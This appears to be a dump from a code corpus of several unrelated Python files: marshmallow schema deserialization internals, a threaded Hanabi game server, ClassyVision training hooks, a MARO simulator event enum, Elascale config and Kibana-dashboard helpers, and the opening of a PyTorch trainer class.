unknown=RAISE,
index=None,
) -> typing.Union[_T, typing.List[_T]]:
"""Deserialize ``data``.
:param dict data: The data to deserialize.
:param ErrorStore error_store: Structure to store errors.
:param bool many: `True` if ``data`` should be deserialized as a collection.
:param bool|tuple partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
:param int index: Index of the item being serialized (for storing errors) if
serializing a collection, otherwise `None`.
:return: A dictionary of the deserialized data.
"""
index_errors = self.opts.index_errors
index = index if index_errors else None
if many:
if not is_collection(data):
error_store.store_error([self.error_messages["type"]], index=index)
ret = [] # type: typing.List[_T]
else:
ret = [
typing.cast(
_T,
self._deserialize(
typing.cast(typing.Mapping[str, typing.Any], d),
error_store=error_store,
many=False,
partial=partial,
unknown=unknown,
index=idx,
),
)
for idx, d in enumerate(data)
]
return ret
ret = self.dict_class()
# Check data is a dict
if not isinstance(data, Mapping):
error_store.store_error([self.error_messages["type"]], index=index)
else:
partial_is_collection = is_collection(partial)
for attr_name, field_obj in self.load_fields.items():
field_name = (
field_obj.data_key if field_obj.data_key is not None else attr_name
)
raw_value = data.get(field_name, missing)
if raw_value is missing:
# Ignore missing field if we're allowed to.
if partial is True or (
partial_is_collection and attr_name in partial
):
continue
d_kwargs = {}
# Allow partial loading of nested schemas.
if partial_is_collection:
prefix = field_name + "."
len_prefix = len(prefix)
sub_partial = [
f[len_prefix:] for f in partial if f.startswith(prefix)
]
d_kwargs["partial"] = sub_partial
else:
d_kwargs["partial"] = partial
getter = lambda val: field_obj.deserialize(
val, field_name, data, **d_kwargs
)
value = self._call_and_store(
getter_func=getter,
data=raw_value,
field_name=field_name,
error_store=error_store,
index=index,
)
if value is not missing:
key = field_obj.attribute or attr_name
set_value(typing.cast(typing.Dict, ret), key, value)
if unknown != EXCLUDE:
fields = {
field_obj.data_key if field_obj.data_key is not None else field_name
for field_name, field_obj in self.load_fields.items()
}
for key in set(data) - fields:
value = data[key]
if unknown == INCLUDE:
set_value(typing.cast(typing.Dict, ret), key, value)
elif unknown == RAISE:
error_store.store_error(
[self.error_messages["unknown"]],
key,
(index if index_errors else None),
)
return ret
def load(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
):
"""Deserialize a data structure to an object defined by this Schema's fields.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:return: Deserialized data
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the deserialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if invalid data are passed.
"""
return self._do_load(
data, many=many, partial=partial, unknown=unknown, postprocess=True
)
def loads(
self,
json_data: str,
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
**kwargs,
):
"""Same as :meth:`load`, except it takes a JSON string as input.
:param json_data: A JSON string of the data to deserialize.
:param many: Whether to deserialize `obj` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:return: Deserialized data
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the deserialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if invalid data are passed.
"""
data = self.opts.render_module.loads(json_data, **kwargs)
return self.load(data, many=many, partial=partial, unknown=unknown)
def _run_validator(
self,
validator_func,
output,
*,
original_data,
error_store,
many,
partial,
pass_original,
index=None,
):
try:
if pass_original: # Pass original, raw data (before unmarshalling)
validator_func(output, original_data, partial=partial, many=many)
else:
validator_func(output, partial=partial, many=many)
except ValidationError as err:
error_store.store_error(err.messages, err.field_name, index=index)
def validate(
self,
data: typing.Mapping,
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
) -> typing.Dict[str, typing.List[str]]:
"""Validate `data` against the schema, returning a dictionary of
validation errors.
:param data: The data to validate.
:param many: Whether to validate `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:return: A dictionary of validation errors.
.. versionadded:: 1.1.0
"""
try:
self._do_load(data, many=many, partial=partial, postprocess=False)
except ValidationError as exc:
return typing.cast(typing.Dict[str, typing.List[str]], exc.messages)
return {}
##### Private Helpers #####
def _do_load(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
postprocess: bool = True,
):
"""Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
            allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
        :param postprocess: Whether to run post_load methods.
:return: Deserialized data
"""
error_store = ErrorStore()
errors = {} # type: typing.Dict[str, typing.List[str]]
many = self.many if many is None else bool(many)
unknown = unknown or self.unknown
if partial is None:
partial = self.partial
# Run preprocessors
if self._has_processors(PRE_LOAD):
try:
processed_data = self._invoke_load_processors(
PRE_LOAD, data, many=many, original_data=data, partial=partial
)
except ValidationError as err:
errors = err.normalized_messages()
result = (
None
) # type: typing.Optional[typing.Union[typing.List, typing.Dict]]
else:
processed_data = data
if not errors:
# Deserialize data
result = self._deserialize(
processed_data,
error_store=error_store,
many=many,
partial=partial,
unknown=unknown,
)
# Run field-level validation
self._invoke_field_validators(
error_store=error_store, data=result, many=many
)
# Run schema-level validation
if self._has_processors(VALIDATES_SCHEMA):
field_errors = bool(error_store.errors)
self._invoke_schema_validators(
error_store=error_store,
pass_many=True,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
self._invoke_schema_validators(
error_store=error_store,
pass_many=False,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
errors = error_store.errors
# Run post processors
if not errors and postprocess and self._has_processors(POST_LOAD):
try:
result = self._invoke_load_processors(
POST_LOAD,
result,
many=many,
original_data=data,
partial=partial,
)
except ValidationError as err:
errors = err.normalized_messages()
if errors:
exc = ValidationError(errors, data=data, valid_data=result)
self.handle_error(exc, data, many=many, partial=partial)
raise exc
return result
def _normalize_nested_options(self) -> None:
"""Apply then flatten nested schema options.
This method is private API.
"""
if self.only is not None:
# Apply the only option to nested fields.
self.__apply_nested_option("only", self.only, "intersection")
# Remove the child field names from the only option.
self.only = self.set_class([field.split(".", 1)[0] for field in self.only])
if self.exclude:
# Apply the exclude option to nested fields.
self.__apply_nested_option("exclude", self.exclude, "union")
# Remove the parent field names from the exclude option.
self.exclude = self.set_class(
[field for field in self.exclude if "." not in field]
)
def __apply_nested_option(self, option_name, field_names, set_operation) -> None:
"""Apply nested options to nested fields"""
# Split nested field names on the first dot.
nested_fields = [name.split(".", 1) for name in field_names if "." in name]
# Partition the nested field names by parent field.
nested_options = defaultdict(list) # type: defaultdict
for parent, nested_names in nested_fields:
nested_options[parent].append(nested_names)
# Apply the nested field options.
for key, options in iter(nested_options.items()):
new_options = self.set_class(options)
original_options = getattr(self.declared_fields[key], option_name, ())
if original_options:
if set_operation == "union":
new_options |= self.set_class(original_options)
if set_operation == "intersection":
new_options &= self.set_class(original_options)
setattr(self.declared_fields[key], option_name, new_options)
def _init_fields(self) -> None:
"""Update self.fields, self.load_fields, and self.dump_fields based on schema options.
This method is private API.
"""
if self.opts.fields:
available_field_names = self.set_class(self.opts.fields)
else:
available_field_names = self.set_class(self.declared_fields.keys())
if self.opts.additional:
available_field_names |= self.set_class(self.opts.additional)
invalid_fields = self.set_class()
if self.only is not None:
# Return only fields specified in only option
field_names = self.set_class(self.only)
invalid_fields |= field_names - available_field_names
else:
field_names = available_field_names
# If "exclude" option or param is specified, remove those fields.
if self.exclude:
# Note that this isn't available_field_names, since we want to
# apply "only" for the actual calculation.
field_names = field_names - self.exclude
invalid_fields |= self.exclude - available_field_names
if invalid_fields:
message = f"Invalid fields for {self}: {invalid_fields}."
raise ValueError(message)
fields_dict = self.dict_class()
for field_name in field_names:
field_obj = self.declared_fields.get(field_name, ma_fields.Inferred())
self._bind_field(field_name, field_obj)
fields_dict[field_name] = field_obj
load_fields, dump_fields = self.dict_class(), self.dict_class()
for field_name, field_obj in fields_dict.items():
if not field_obj.dump_only:
load_fields[field_name] = field_obj
if not field_obj.load_only:
dump_fields[field_name] = field_obj
dump_data_keys = [
field_obj.data_key if field_obj.data_key is not None else name
for name, field_obj in dump_fields.items()
]
if len(dump_data_keys) != len(set(dump_data_keys)):
data_keys_duplicates = {
x for x in dump_data_keys if dump_data_keys.count(x) > 1
}
raise ValueError(
"The data_key argument for one or more fields collides "
"with another field's name or data_key argument. "
"Check the following field names and "
"data_key arguments: {}".format(list(data_keys_duplicates))
)
load_attributes = [obj.attribute or name for name, obj in load_fields.items()]
if len(load_attributes) != len(set(load_attributes)):
attributes_duplicates = {
x for x in load_attributes if load_attributes.count(x) > 1
}
raise ValueError(
"The attribute argument for one or more fields collides "
"with another field's name or attribute argument. "
"Check the following field names and "
"attribute arguments: {}".format(list(attributes_duplicates))
)
self.fields = fields_dict
self.dump_fields = dump_fields
self.load_fields = load_fields
def on_bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None:
"""Hook to modify a field when it is bound to the `Schema`.
No-op by default.
"""
return None
def _bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None:
"""Bind field to the schema, setting any necessary attributes on the
field (e.g. parent and name).
Also set field load_only and dump_only values if field_name was
specified in ``class Meta``.
"""
if field_name in self.load_only:
field_obj.load_only = True
if field_name in self.dump_only:
field_obj.dump_only = True
try:
field_obj._bind_to_schema(field_name, self)
except TypeError as error:
# Field declared as a class, not an instance. Ignore type checking because
# we handle unsupported arg types, i.e. this is dead code from
# the type checker's perspective.
if isinstance(field_obj, type) and issubclass(field_obj, base.FieldABC):
msg = (
'Field for "{}" must be declared as a '
"Field instance, not a class. "
'Did you mean "fields.{}()"?'.format(field_name, field_obj.__name__)
)
raise TypeError(msg) from error
raise error
self.on_bind_field(field_name, field_obj)
@lru_cache(maxsize=8)
def _has_processors(self, tag) -> bool:
return bool(self._hooks[(tag, True)] or self._hooks[(tag, False)])
def _invoke_dump_processors(
self, tag: str, data, *, many: bool, original_data=None
):
# The pass_many post-dump processors may do things like add an envelope, so
# invoke those after invoking the non-pass_many processors which will expect
# to get a list of items.
data = self._invoke_processors(
tag, pass_many=False, data=data, many=many, original_data=original_data
)
data = self._invoke_processors(
tag, pass_many=True, data=data, many=many, original_data=original_data
)
return data
def _invoke_load_processors(
self,
tag: str,
data,
*,
many: bool,
original_data,
partial: typing.Union[bool, types.StrSequenceOrSet],
):
# This has to invert the order of the dump processors, so run the pass_many
# processors first.
data = self._invoke_processors(
tag,
pass_many=True,
data=data,
many=many,
original_data=original_data,
partial=partial,
)
data = self._invoke_processors(
tag,
pass_many=False,
data=data,
many=many,
original_data=original_data,
partial=partial,
)
return data
def _invoke_field_validators(self, *, error_store: ErrorStore, data, many: bool):
for attr_name in self._hooks[VALIDATES]:
validator = getattr(self, attr_name)
validator_kwargs = validator.__marshmallow_hook__[VALIDATES]
field_name = validator_kwargs["field_name"]
try:
field_obj = self.fields[field_name]
except KeyError as error:
if field_name in self.declared_fields:
continue
raise ValueError(f'"{field_name}" field does not exist.') from error
data_key = (
field_obj.data_key if field_obj.data_key is not None else field_name
)
if many:
for idx, item in enumerate(data):
try:
value = item[field_obj.attribute or field_name]
except KeyError:
pass
else:
validated_value = self._call_and_store(
getter_func=validator,
data=value,
field_name=data_key,
error_store=error_store,
index=(idx if self.opts.index_errors else None),
)
if validated_value is missing:
data[idx].pop(field_name, None)
else:
try:
value = data[field_obj.attribute or field_name]
except KeyError:
pass
else:
validated_value = self._call_and_store(
getter_func=validator,
data=value,
field_name=data_key,
error_store=error_store,
)
if validated_value is missing:
data.pop(field_name, None)
def _invoke_schema_validators(
self,
*,
error_store: ErrorStore,
pass_many: bool,
data,
original_data,
many: bool,
partial: typing.Union[bool, types.StrSequenceOrSet],
field_errors: bool = False,
):
for attr_name in self._hooks[(VALIDATES_SCHEMA, pass_many)]:
validator = getattr(self, attr_name)
validator_kwargs = validator.__marshmallow_hook__[
(VALIDATES_SCHEMA, pass_many)
]
if field_errors and validator_kwargs["skip_on_field_errors"]:
continue
pass_original = validator_kwargs.get("pass_original", False)
if many and not pass_many:
for idx, (item, orig) in enumerate(zip(data, original_data)):
self._run_validator(
validator,
item,
original_data=orig,
error_store=error_store,
many=many,
partial=partial,
index=idx,
pass_original=pass_original,
)
else:
self._run_validator(
validator,
data,
original_data=original_data,
error_store=error_store,
many=many,
pass_original=pass_original,
partial=partial,
)
def _invoke_processors(
self,
tag: str,
*,
pass_many: bool,
data,
many: bool,
original_data=None,
**kwargs,
):
key = (tag, pass_many)
for attr_name in self._hooks[key]:
# This will be a bound method.
processor = getattr(self, attr_name)
processor_kwargs = processor.__marshmallow_hook__[key]
pass_original = processor_kwargs.get("pass_original", False)
if many and not pass_many:
if pass_original:
data = [
processor(item, original, many=many, **kwargs)
for item, original in zip(data, original_data)
]
else:
data = [processor(item, many=many, **kwargs) for item in data]
else:
if pass_original:
data = processor(data, original_data, many=many, **kwargs)
else:
data = processor(data, many=many, **kwargs)
return data
BaseSchema = Schema # for backwards compatibility
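# --- Usage sketch (hypothetical, not part of this module): illustrates the hook
# ordering implemented above.  On dump, per-item @post_dump hooks run before
# pass_many=True hooks (which see the whole list and can add an envelope); on
# load, the pass_many hooks run first and undo the envelope.  Assumes the
# installed `marshmallow` package; names such as AlbumSchema are made up.
def _demo_envelope_hooks():
    from marshmallow import (Schema, ValidationError, fields, post_dump,
                             pre_load, validates)

    class AlbumSchema(Schema):
        title = fields.Str(required=True)
        year = fields.Int()

        @validates("year")
        def _check_year(self, value):
            # field-level hook, dispatched by _invoke_field_validators above
            if value < 1900:
                raise ValidationError("year looks wrong")

        @post_dump(pass_many=True)
        def _wrap(self, data, many, **kwargs):
            # pass_many hook: sees the full list, so it can add an envelope
            return {"albums": data if many else [data]}

        @pre_load(pass_many=True)
        def _unwrap(self, data, many, **kwargs):
            # the load path runs pass_many hooks first, removing the envelope
            return data["albums"] if many else data["albums"][0]

    schema = AlbumSchema(many=True)
    dumped = schema.dump([{"title": "Clouds", "year": 1969}])
    return schema.load(dumped)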
f3a29468b38ab3fdbc7d0cf5ffd1c45612225fd5 | 7,070 | py | Python | server.py | simsax/hanabi-bot | MIT
import os
import GameData
import socket
from game import Game
from game import Player
import threading
from constants import *
import logging
import sys
mutex = threading.Lock()
# SERVER
playerConnections = {}
game = Game()
playersOk = []
statuses = [
"Lobby",
"Game"
]
status = statuses[0]
commandQueue = {}
numPlayers = 2
def manageConnection(conn: socket, addr):
global status
global game
with conn:
logging.info("Connected by: " + str(addr))
keepActive = True
playerName = ""
while keepActive:
print("SERVER WAITING")
data = conn.recv(DATASIZE)
mutex.acquire(True)
if not data:
del playerConnections[playerName]
logging.warning("Player disconnected: " + playerName)
game.removePlayer(playerName)
if len(playerConnections) == 0:
logging.info("Shutting down server")
os._exit(0)
keepActive = False
else:
print(f"SERVER PROCESSING {GameData.GameData.deserialize(data)}")
data = GameData.GameData.deserialize(data)
print(f"SERVER RECEIVED {type(data)} from {data.sender}")
if status == "Lobby":
if type(data) is GameData.ClientPlayerAddData:
playerName = data.sender
commandQueue[playerName] = []
                        if playerName in playerConnections.keys() or playerName == "" or playerName is None:
logging.warning("Duplicate player: " + playerName)
conn.send(GameData.ServerActionInvalid("Player with that name already registered.").serialize())
mutex.release()
return
playerConnections[playerName] = (conn, addr)
logging.info("Player connected: " + playerName)
game.addPlayer(playerName)
conn.send(GameData.ServerPlayerConnectionOk(
playerName).serialize())
elif type(data) is GameData.ClientPlayerStartRequest:
game.setPlayerReady(playerName)
logging.info("Player ready: " + playerName)
conn.send(GameData.ServerPlayerStartRequestAccepted(len(game.getPlayers()), game.getNumReadyPlayers()).serialize())
if len(game.getPlayers()) == game.getNumReadyPlayers() and len(game.getPlayers()) >= numPlayers:
listNames = []
for player in game.getPlayers():
listNames.append(player.name)
logging.info(
"Game start! Between: " + str(listNames))
for player in playerConnections:
playerConnections[player][0].send(
GameData.ServerStartGameData(listNames).serialize())
game.start()
# This ensures every player is ready to send requests
elif type(data) is GameData.ClientPlayerReadyData:
playersOk.append(1)
# If every player is ready to send requests, then the game can start
if len(playersOk) == len(game.getPlayers()):
status = "Game"
for player in commandQueue:
for cmd in commandQueue[player]:
singleData, multipleData = game.satisfyRequest(
cmd, player)
if singleData is not None:
playerConnections[player][0].send(
singleData.serialize())
if multipleData is not None:
for id in playerConnections:
playerConnections[id][0].send(
multipleData.serialize())
if game.isGameOver():
os._exit(0)
commandQueue.clear()
elif type(data) is not GameData.ClientPlayerAddData and type(
data) is not GameData.ClientPlayerStartRequest and type(
data) is not GameData.ClientPlayerReadyData:
commandQueue[playerName].append(data)
# In game
elif status == "Game":
singleData, multipleData = game.satisfyRequest(
data, playerName)
if singleData is not None:
conn.send(singleData.serialize())
if multipleData is not None:
for id in playerConnections:
playerConnections[id][0].send(
multipleData.serialize())
if game.isGameOver():
logging.info("Game over")
logging.info("Game score: " +
str(game.getScore()))
# os._exit(0)
players = game.getPlayers()
game = Game()
for player in players:
logging.info("Starting new game")
game.addPlayer(player.name)
game.start()
mutex.release()
def manageInput():
while True:
data = input()
if data == "exit":
logging.info("Closing the server...")
os._exit(0)
def manageNetwork():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
logging.info("Hanabi server started on " + HOST + ":" + str(PORT))
while True:
s.listen()
conn, addr = s.accept()
threading.Thread(target=manageConnection,
args=(conn, addr)).start()
def start_server(nplayers):
global numPlayers
numPlayers = nplayers
logging.basicConfig(filename="game.log", level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s',
datefmt="%m/%d/%Y %I:%M:%S %p")
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
threading.Thread(target=manageNetwork).start()
manageInput()
if __name__ == '__main__':
print("Type 'exit' to end the program")
if len(sys.argv) > 1:
if int(sys.argv[1]) > 1:
numPlayers = int(sys.argv[1])
    start_server(numPlayers)
4cebf86fdf6e0a2ea053d2105947d957b7def4df | 3,518 | py | Python | classy_vision/hooks/classy_hook.py | jerryzh168/ClassyVision-1 | MIT | stars: 1
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from abc import ABC, abstractmethod
from typing import Any, Dict
from classy_vision.generic.util import log_class_usage
class ClassyHookState:
"""Class to store state within instances of ClassyHook.
Any serializable data can be stored in the instance's attributes.
"""
def get_classy_state(self) -> Dict[str, Any]:
return self.__dict__
def set_classy_state(self, state_dict: Dict[str, Any]):
# We take a conservative approach and only update the dictionary instead of
# replacing it. This allows hooks to continue functioning in case the state
# is loaded from older implementations.
self.__dict__.update(state_dict)
class ClassyHook(ABC):
"""Base class for hooks.
Hooks allow to inject behavior at different places of the training loop, which
are listed below in the chronological order.
on_start -> on_phase_start ->
on_step -> on_phase_end -> on_end
Deriving classes should call ``super().__init__()`` and store any state in
``self.state``. Any state added to this property should be serializable.
E.g. -
.. code-block:: python
class MyHook(ClassyHook):
def __init__(self, a, b):
super().__init__()
self.state.a = [1,2,3]
self.state.b = "my_hook"
# the following line is not allowed
# self.state.my_lambda = lambda x: x^2
"""
def __init__(self):
log_class_usage("Hooks", self.__class__)
self.state = ClassyHookState()
@classmethod
def from_config(cls, config) -> "ClassyHook":
return cls(**config)
def _noop(self, *args, **kwargs) -> None:
"""Derived classes can set their hook functions to this.
This is useful if they want those hook functions to not do anything.
"""
pass
@classmethod
def name(cls) -> str:
"""Returns the name of the class."""
return cls.__name__
@abstractmethod
def on_start(self, task) -> None:
"""Called at the start of training."""
pass
@abstractmethod
def on_phase_start(self, task) -> None:
"""Called at the start of each phase."""
pass
@abstractmethod
def on_step(self, task) -> None:
"""Called each time after parameters have been updated by the optimizer."""
pass
@abstractmethod
def on_phase_end(self, task) -> None:
"""Called at the end of each phase (epoch)."""
pass
@abstractmethod
def on_end(self, task) -> None:
"""Called at the end of training."""
pass
def get_classy_state(self) -> Dict[str, Any]:
"""Get the state of the ClassyHook.
The returned state is used for checkpointing.
Returns:
            A state dictionary containing the state of the hook.
"""
return self.state.get_classy_state()
def set_classy_state(self, state_dict: Dict[str, Any]) -> None:
"""Set the state of the ClassyHook.
Args:
state_dict: The state dictionary. Must be the output of a call to
:func:`get_classy_state`.
This is used to load the state of the hook from a checkpoint.
"""
self.state.set_classy_state(state_dict)
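# --- Usage sketch (hypothetical): a concrete hook following the pattern from the
# class docstring above.  Unused hook points are mapped to ClassyHook._noop, and
# only serializable data is kept on self.state so the get/set_classy_state
# round-trip works for checkpointing.  The `task.losses` attribute is an
# assumption about the task object passed in by the trainer.
class LossLoggingHook(ClassyHook):
    on_start = ClassyHook._noop
    on_phase_start = ClassyHook._noop
    on_phase_end = ClassyHook._noop
    on_end = ClassyHook._noop

    def __init__(self):
        super().__init__()
        self.state.losses = []

    def on_step(self, task) -> None:
        losses = getattr(task, "losses", None)
        if losses:
            self.state.losses.append(losses[-1])


def _demo_state_roundtrip():
    hook = LossLoggingHook()
    hook.state.losses.append(0.7)
    restored = LossLoggingHook()
    restored.set_classy_state(hook.get_classy_state())
    return restored.state.losses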
bb3478a59ce99552162a39f1e455a7112108d3ca | 549 | py | Python | maro/simulator/scenarios/cim/events.py | yangboz/maro | MIT | stars: 598
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from enum import Enum
class Events(Enum):
"""Event type for CIM problem."""
# RELEASE_EMPTY = 10
RETURN_FULL = "return_full"
LOAD_FULL = "load_full"
DISCHARGE_FULL = "discharge_full"
# RELEASE_FULL = 14
RETURN_EMPTY = "return_empty"
ORDER = "order"
VESSEL_ARRIVAL = "vessel_arrival"
VESSEL_DEPARTURE = "vessel_departure"
PENDING_DECISION = "pending_decision"
LOAD_EMPTY = "load_empty"
DISCHARGE_EMPTY = "discharge_empty"
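# --- Usage sketch (hypothetical): branching on the event types above.  The
# descriptions are illustrative only; the real CIM business engine registers
# handlers for these events through its event buffer rather than an if/else.
def describe_event(event: Events) -> str:
    if event in (Events.LOAD_FULL, Events.DISCHARGE_FULL):
        return "full container move: " + event.value
    if event is Events.PENDING_DECISION:
        return "agent action required"
    return event.value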
0cbf86d8ba6b99c6d8be0d41324e87c3d576e2ab | 4,267 | py | Python | autoscaler/ui/util.py | RajsimmanRavi/Elascale_secure | MIT | stars: 1
import configparser
import os
import json
import requests
import sys
import autoscaler.conf.engine_config as eng
"""
Function to read a config file and return the parsed ConfigParser object.
"""
def read_file(f_name):
config = configparser.ConfigParser()
config.read(f_name)
return config
"""
Function to insert modified values into the appropriate config file (micro or macro).
Returns nothing. If an error occurs, the try/except in the caller will catch it.
The argument is the data received from the client/browser end. The format is JSON:
{"service_type": "xx", "service": "xx", "${config_param}": "xx" ...}
service_type: defines whether it's a micro-service or a macro-service
service: defines which service is getting modified (e.g. iot_app_cass, iot_edge_processor)
The other keys are the config params (e.g. cpu_up_lim, max_replica)
The corresponding values are the newly modified values that need to be written to file.
"""
def write_file(data):
config = configparser.ConfigParser()
#Convert string to json
data = json.loads(data)
service_type = data["service_type"] # Tells us whether 'micro' or 'macro'
service = data["service"]
micro_file = eng.MICRO_CONFIG
macro_file = eng.MACRO_CONFIG
# Read appropriate ini file
if service_type == "micro":
config.read(micro_file)
else:
config.read(macro_file)
#delete service_type and service keys from dict
del data["service_type"]
del data["service"]
    for key, value in data.items():
# Set appropriate values
config.set(service,key,value)
#Write the changes to file
    if service_type == "micro":
        with open(micro_file, 'w') as configfile:
            config.write(configfile)
    else:
        with open(macro_file, 'w') as configfile:
            config.write(configfile)
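# --- Usage sketch (hypothetical): building the JSON payload described in the
# docstring above and handing it to write_file().  The section and option names
# (iot_app_cass, cpu_up_lim, max_replica) are illustrative and must match
# entries that actually exist in the micro/macro .ini files.
def _demo_write_file():
    payload = json.dumps({
        "service_type": "micro",
        "service": "iot_app_cass",
        "cpu_up_lim": "80",
        "max_replica": "5",
    })
    write_file(payload)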
"""
Function to insert the dashboard ID into the URL link (used in the function below).
1st argument: dash_title: needed because we use different URLs for different dashboards
2nd argument: dash_id: the ID we need to insert into the URL
3rd argument: elastic_ip_addr: IP address of the Elasticsearch host
"""
def insert_id_url(dash_title, dash_id, elastic_ip_addr):
# As per Byungchul, I need to look only the last 1 min for Host and Container statistics which has titles "HostStatics_1" and "ContainerStatistics_2". Therefore they have different links
if ("_1" in dash_title) or ("_2" in dash_title):
link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-1m%2Cmode%3Arelative%2Cto%3Anow))"
else:
link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-15m%2Cmode%3Aabsolute%2Cto%3Anow))"
sys.stdout.flush()
return link
"""
Function to fetch the Kibana dashboard links. We decided to split one major dashboard into multiple smaller ones.
1. Host Stats - focuses on VMs - Get last 1min stats
2. Container Stats - Get last 1min stats
3. All Graphs (Eg. CPU, mem etc.)
4. All tables
"""
def get_kibana_links(elastic_ip_addr, nginx_cert):
# hostname has to be 'elasticsearch' in order for SSL authentication
req = requests.get("https://elasticsearch:9200/.kibana/dashboard/_search", verify=nginx_cert)
output = req.json()
output_dict = {}
#get all the dashboard dictionaries
dash_dicts = output["hits"]["hits"]
#go through each dict and extract the dashboard IDs
for dash in dash_dicts:
#Our interested dashboards have titles with '_'. So filter only those ones
if "_" in dash["_source"]["title"]:
#get title of the dashboard
dash_title = dash["_source"]["title"]
#get id of the dashboard
dash_id = dash["_id"]
output_dict[dash_title] = insert_id_url(dash_title, dash_id, elastic_ip_addr)
sys.stdout.flush()
return output_dict
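# --- Usage sketch (hypothetical): fetching the embeddable dashboard links and
# formatting them.  The Elasticsearch IP and the nginx certificate path are
# placeholders; in a real deployment they come from the Elascale configuration.
def _demo_dashboard_links():
    links = get_kibana_links("10.0.0.5", "/etc/nginx/certs/nginx.crt")
    return [title + " -> " + url for title, url in links.items()]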
c4bb689e5daa7939ebb1ec813fb0fff4fe31a42b | 8,910 | py | Python | mltc/train/trainer.py | hscspring/Multi-Label-Text-Classification | MIT | stars: 52
import torch
from callback.progressbar import ProgressBar
from utils.utils import (restore_checkpoint, model_device,
summary, seed_everything, AverageMeter)
from torch.nn.utils import clip_grad_norm_
class Trainer(object):
def __init__(self, n_gpu,
model,
epochs,
logger,
criterion,
optimizer,
lr_scheduler,
early_stopping,
epoch_metrics,
batch_metrics,
gradient_accumulation_steps,
grad_clip=0.0,
verbose=1,
fp16=None,
resume_path=None,
training_monitor=None,
model_checkpoint=None
):
self.start_epoch = 1
self.global_step = 0
self.n_gpu = n_gpu
self.model = model
self.epochs = epochs
self.logger = logger
self.fp16 = fp16
self.grad_clip = grad_clip
self.verbose = verbose
self.criterion = criterion
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.early_stopping = early_stopping
self.epoch_metrics = epoch_metrics
self.batch_metrics = batch_metrics
self.model_checkpoint = model_checkpoint
self.training_monitor = training_monitor
self.gradient_accumulation_steps = gradient_accumulation_steps
self.model, self.device = model_device(
n_gpu=self.n_gpu, model=self.model)
if self.fp16:
try:
from apex import amp
except ImportError:
raise ImportError(
"Please install apex from \
https://www.github.com/nvidia/apex to use fp16 training.")
if resume_path:
self.logger.info(f"\nLoading checkpoint: {resume_path}")
resume_dict = torch.load(resume_path / 'checkpoint_info.bin')
best = resume_dict['epoch']
self.start_epoch = resume_dict['epoch']
if self.model_checkpoint:
self.model_checkpoint.best = best
self.logger.info(f"\nCheckpoint '{resume_path}' \
and epoch {self.start_epoch} loaded")
def epoch_reset(self):
self.outputs = []
self.targets = []
self.result = {}
for metric in self.epoch_metrics:
metric.reset()
def batch_reset(self):
self.info = {}
